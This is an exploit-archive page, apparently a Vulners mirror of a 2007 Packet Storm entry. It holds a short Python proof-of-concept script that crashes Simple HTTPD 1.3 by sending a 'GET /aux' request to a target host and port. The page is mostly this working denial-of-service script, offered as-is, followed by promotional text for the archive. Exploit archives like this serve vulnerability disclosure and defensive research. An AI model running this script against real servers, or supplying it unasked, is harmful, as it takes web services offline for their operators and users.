Lucene search
K

simple-py.txt

🗓️ 12 Dec 2007 00:00:00Reported by shinnaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Simple HTTPD 1.3 Denial of Service script utilizing socket connections and GET requests.

Code
`#usage: poc.py host port  
  
import socket  
import sys  
  
print "-----------------------------------------------------------------------"  
print "Simple HTTPD 1.3 /aux Denial of Service\n"  
print "url: http://shttpd.sourceforge.net\n"  
print "author: shinnai"  
print "mail: shinnai[at]autistici[dot]org"  
print "site: http://shinnai.altervista.org"  
print "-----------------------------------------------------------------------"  
  
host = sys.argv[1]  
port = long(sys.argv[2])  
  
try:  
request = "GET /aux HTTP/1.1\n\n"  
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connection.connect((host, port))  
connection.send(request)  
except:  
print "Unable to connect. exiting."  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
21